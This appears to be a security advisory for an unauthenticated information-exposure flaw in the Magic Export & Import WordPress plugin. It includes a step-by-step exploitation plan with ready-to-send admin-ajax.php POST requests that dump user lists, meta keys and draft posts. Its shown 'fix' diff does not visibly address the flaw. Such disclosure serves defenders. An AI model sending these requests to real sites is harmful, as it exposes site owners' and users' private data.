Magic Export & Import <= 1.1.0 - Unauthenticated Information Exposure
Description
The Magic Export & Import plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.1.0. This makes it possible for unauthenticated attackers to extract sensitive user or configuration data.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:NTechnical Details
<=1.1.0What Changed in the Fix
Changes introduced in v1.2.0
Source Code
WordPress.org SVN# Exploitation Research Plan - CVE-2026-5335 ## 1. Vulnerability Summary The **Magic Export & Import** plugin (<= 1.1.0) is vulnerable to **Unauthenticated Information Exposure**. The vulnerability exists because the plugin registers several AJAX handlers intended for administrative export/import f…
Show full research plan
Exploitation Research Plan - CVE-2026-5335
1. Vulnerability Summary
The Magic Export & Import plugin (<= 1.1.0) is vulnerable to Unauthenticated Information Exposure. The vulnerability exists because the plugin registers several AJAX handlers intended for administrative export/import functionality via wp_ajax_nopriv_ (unauthenticated) hooks without implementing sufficient capability checks or nonce verification. This allows an unauthenticated attacker to invoke these handlers and retrieve sensitive data, including user lists, meta keys, and potentially WooCommerce order details or configuration settings.
2. Attack Vector Analysis
- Endpoint:
/wp-admin/admin-ajax.php - Vulnerable Actions:
get_individual_export_users(Identified viaassets/magic-export-import.js)get_individual_export_shop_orders(WooCommerce data)get_individual_export_posts(Private/Draft posts)refresh_export_users_keys(Meta key enumeration)
- HTTP Method:
POST - Authentication: None Required (
nopriv). - Preconditions: The plugin must be active. For user data exposure, the
usersexport type must be initialized (standard).
3. Code Flow
- Entry Point: An unauthenticated request is sent to
admin-ajax.phpwith theactionparameter set to a dynamic string likeget_individual_export_users. - Hook Registration: The plugin (specifically in
includes/magic-types/class-magic-ex-im-type-users.php, inferred from the setup loader) registers this action to a handler. - Vulnerable Handler: The handler likely calls
get_individual_export_items($args)as defined in the abstractMagic_EX_IM_Typeclass (includes/class-magic-ex-im-type.php). - Data Retrieval: The
usersimplementation of this method performs a user query (e.g.,get_users()or$wpdbquery) based on theq(query) parameter provided in the request. - Sink: The retrieved data (usernames, IDs, etc.) is returned as a JSON object to the requester.
4. Nonce Acquisition Strategy
Analysis of assets/magic-export-import.js (lines 78-98) shows that the select2 AJAX configuration for individual item exports does not include a nonce parameter:
// From assets/magic-export-import.js
ajax: {
type: 'POST',
url: WPLocalize.admin_ajax_url,
delay: 400,
dataType: 'json',
data: function (params) {
params.action = `get_individual_export_${WPLocalize.magic_type}` // e.g., get_individual_export_users
params.magic_item = WPLocalize.magic_item // e.g., users
return params; // No nonce included here
},
},
Because the plugin intended this for unauthenticated access (as indicated by the "Unauthenticated" classification and the absence of nonces in the JS), no nonce is required to trigger the information exposure.
5. Exploitation Strategy
Target: User Information Exposure
This exploit attempts to leak the site's user list (IDs, login names, and display names).
- HTTP Request:
POST /wp-admin/admin-ajax.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded action=get_individual_export_users&magic_item=users&q= - Payload Parameters:
action:get_individual_export_usersmagic_item:usersq: An empty string (to match all users) or a wildcard.
- Expected Response: A JSON object containing an array of user objects.
{ "results": [ {"id": 1, "text": "admin <code>1<\/code>"}, {"id": 2, "text": "target_user <code>2<\/code>"} ] }
Alternative Target: Meta Key / Configuration Exposure
This exploit attempts to leak the available meta keys in the database.
- HTTP Request:
POST /wp-admin/admin-ajax.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded action=refresh_export_users_keys&magic_item=users - Expected Response: JSON containing
export_keys_htmlwhich reveals meta keys used in thewp_usermetatable.
6. Test Data Setup
Before running the exploit, ensure the environment has identifiable data:
- Create Users:
wp user create victim_one victim1@example.com --role=editorwp user create victim_two victim2@example.com --role=author
- Plugin Setup: Ensure the Magic Export & Import plugin (v1.1.0) is activated.
wp plugin activate magic-export-import
7. Expected Results
- The request to
get_individual_export_usersreturns a HTTP 200 OK. - The body contains a JSON object listing the created users (
victim_one,victim_two, and the admin). - No authentication cookies or headers are required in the request.
8. Verification Steps
- Compare Data: Run
wp user list --fields=ID,user_loginand verify the output matches the IDs and names leaked in the AJAX response. - Check Capability Enforcement: Attempt the same request on a patched version (1.2.0) and verify it returns
0or a403 Forbiddenerror.
9. Alternative Approaches
If the users type is restricted or disabled, attempt to leak other sensitive items:
- Comments:
action=get_individual_export_comments&magic_item=comments&q= - ACF Options:
action=get_individual_export_acf_options_pages&magic_item=acf_options_pages&q= - Posts (including Drafts):
action=get_individual_export_posts&magic_item=post&q=(wheremagic_itemis the post type slug).
Summary
The Magic Export & Import plugin for WordPress is vulnerable to unauthenticated information exposure due to the registration of several AJAX handlers via 'wp_ajax_nopriv_' hooks without capability checks or nonce verification. This allows unauthenticated attackers to query and retrieve sensitive data, including user lists, meta keys, and WooCommerce order details, by directly hitting the admin-ajax.php endpoint.
Vulnerable Code
// assets/magic-export-import.js lines 78-98 (v1.1.6) this.$exportItemsSelect.select2({ placeholder: 'Select items to export', minimumInputLength: 0, closeOnSelect: false, width: '100%', escapeMarkup: (markup) => { return markup }, templateSelection: (tag, container) => { return tag.text.split('<code>')[0] }, ajax: { type: 'POST', // AJAX request lacking nonce or session validation url: WPLocalize.admin_ajax_url, delay: 400, dataType: 'json', data: function (params) { params.action = `get_individual_export_${WPLocalize.magic_type}` params.magic_item = WPLocalize.magic_item return params }, }, })
Security Fix
@@ -32,23 +32,6 @@ this.$exFiltersTogglerCheckbox.closest('.form-field').remove() } - let $exportFileLink = $('#magic-ex-generated-file') - - // Download newly generated export file if exists, compatible with Safari. - if ($exportFileLink.length) { - setTimeout(() => { - let fileURL = $exportFileLink.attr('href'), - link = document.createElement('a') - - link.href = fileURL - link.download = '' - - document.body.appendChild(link) - link.click() - document.body.removeChild(link) - }, 500) - } - // Init magic item select. this.$magicItemSelect.select2({
Exploit Outline
An unauthenticated attacker can exploit this vulnerability by sending a POST request to the WordPress AJAX endpoint (/wp-admin/admin-ajax.php) targeting actions registered with the 'nopriv' prefix, such as 'get_individual_export_users'. By providing parameters like 'magic_item=users' and an empty search query 'q=', the attacker can trigger a server-side query that returns a JSON list of all registered users (including IDs and login names). No authentication or nonce is required because the plugin fails to implement 'current_user_can()' or 'check_ajax_referer()' in the corresponding PHP handlers.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.